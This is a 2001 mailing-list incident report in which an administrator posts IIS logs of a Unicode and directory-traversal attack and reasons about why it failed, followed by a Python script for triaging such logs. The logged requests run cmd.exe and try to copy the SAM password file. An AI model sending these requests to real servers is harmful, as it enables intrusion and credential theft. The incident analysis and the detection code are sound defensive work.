Security Incidents mailing list archives
IIS Unicode attack decode
From: ROBERT DEMAIN <rdemain () RM COM>
Date: Tue, 20 Mar 2001 14:56:22 -0000
Hello All,

Recently I've been seeing quite a few attempts from the same Russian IP trying to send Unicode commands to a web server. These attacks were picked up by an IDS. Below are extracts from the log file on the web server (see below). My understanding of what has happened here is as follows:

- attacker tries a few attempts at doing a dir listing of c: and d:
- attacker tries to copy important stuff from the \repair directory to c:\inetpub\wwwroot (most unfriendly)
- attacker tries to copy a bitmap (Blue%20Lace%2016.bmp) - not sure what this is about

Putting it all together, it seems the attacker tried to use the IIS 4 and 5 Unicode exploit to copy the SAM file to a place where he/she/it thought they could get it from (on this server c:\inetpub\wwwroot is not the default web site or anything, but I believe it is on a default IIS install). This failed for two main reasons:

1. the iusr_servername account (which is the user account this exploit can run as - correct me if I'm wrong) does not have permissions on \repair
2. the copy of the file to c:\inetpub\wwwroot would also fail as iusr_servername would not have the rights.

Anyone have any comments on this? Anyone else seen activity like this?
Regards
Rob

2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 HEAD /Default.htm - 200 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /cgi-shl/win-c-sample.exe - 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /scripts/\/winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 195.239.1.206 - my.web.server.ip 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /scripts/\/winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:22:58 195.239.1.206 - my.web.server.ip 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /scripts/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:23:00 195.239.1.206 - my.web.server.ip 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2001-03-19 22:23:14 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:23:31 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:23:56 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+d:\SOMETHINGOTDOWITHME%20WEB%20HOSTING 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:24:48 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\repair\sam._+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:25:10 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:25:15 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\winnt\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:25:42 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\winnt\repair\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:26:45 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\repair\sam+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:28:10 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:28:27 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\winnt\Blue%20Lace%2016.bmp+c:\Inetpub\wwwroot 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:28:37 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\wint\ 502 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:28:59 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:29:13 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\AdminScripts\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
2001-03-19 22:29:31 195.239.1.206 - my.web.server.ip 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\Inetpub\wwwroot\ 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt;+Zenon)
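As an added illustration (not from the post or its author), a small Python triage script for the W3C extended log format shown above: it decodes the URI the way IIS did, including the overlong %c0%af and %c1%9c separator encodings that gave the "Unicode" attack its name, flags cmd.exe invocations, and separates 200s (command output went back to the client) from attempts that did not. The sample lines and addresses are constructed, and the field names and labels are this script's own.

```python
from collections import Counter
from urllib.parse import unquote

# Constructed sample in the W3C extended format of the post (date time c-ip cs-username s-ip s-port
# cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)); placeholder addresses, last two lines added.
SAMPLE_LOG = """\
2001-03-19 22:22:56 10.0.0.1 - 10.0.0.2 80 HEAD /Default.htm - 200 Mozilla/3.0+(compatible)
2001-03-19 22:22:56 10.0.0.1 - 10.0.0.2 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir+c:\\ 200 Mozilla/3.0+(compatible)
2001-03-19 22:24:48 10.0.0.1 - 10.0.0.2 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+copy+c:\\winnt\\repair\\sam._+c:\\Inetpub\\wwwroot 502 Mozilla/4.0+(compatible)
2001-03-19 22:28:10 10.0.0.1 - 10.0.0.2 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200 Mozilla/4.0+(compatible)
2001-03-19 22:30:00 10.0.0.3 - 10.0.0.2 80 GET /images/logo.gif - 200 Mozilla/4.0+(compatible)
"""

FIELDS = ("date", "time", "c_ip", "user", "s_ip", "port", "method", "stem", "query", "status", "agent")
# Overlong UTF-8 spellings of '/' and '\' that unpatched IIS 4/5 decoded only after its traversal check (MS00-078).
OVERLONG = {"%c0%af": "/", "%c1%9c": "\\"}

def normalize_uri(stem):
    """Decode the stem the way the server did, so the matcher sees the path that was actually acted on."""
    s = stem.lower()
    for enc, ch in OVERLONG.items():
        s = s.replace(enc, ch)
    return unquote(s).replace("\\", "/")   # then plain %XX escapes, then one separator style

def parse_line(line):
    """Split one log line into its eleven fields; returns None for blank or malformed lines."""
    parts = line.split(" ", len(FIELDS) - 1)
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def decoded_command(entry):
    """IIS writes spaces in the query field as '+'; undo that and %XX so the command reads naturally."""
    return unquote(entry["query"].replace("+", " "))

def classify(entry):
    """Label an entry: 'cmd_executed' (200, output returned), 'cmd_attempt', 'traversal', or None."""
    path = normalize_uri(entry["stem"])
    if "/cmd.exe" in path:
        return "cmd_executed" if entry["status"] == "200" else "cmd_attempt"
    if "/../" in path:
        return "traversal"
    return None

def triage(log_text):
    """Count findings per (source IP, label); one alert per pair is enough to open an investigation."""
    findings = Counter()
    for entry in filter(None, map(parse_line, log_text.splitlines())):
        if (label := classify(entry)):
            findings[(entry["c_ip"], label)] += 1
    return findings
```

The same normalisation belongs in front of any signature that looks for a literal "../", since the encoded form in the fourth sample line would otherwise slip past it.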